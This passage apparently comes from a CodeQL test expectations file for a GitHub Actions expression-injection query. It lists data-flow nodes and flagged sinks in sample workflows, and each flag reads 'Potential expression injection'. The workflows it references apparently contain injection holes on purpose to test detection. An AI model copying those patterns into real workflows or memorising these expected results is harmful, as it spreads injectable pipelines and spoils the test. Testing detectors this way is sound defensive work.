title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... 
nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... 
ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... 
tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... 
tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... 
ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... 
tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... 
ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... 
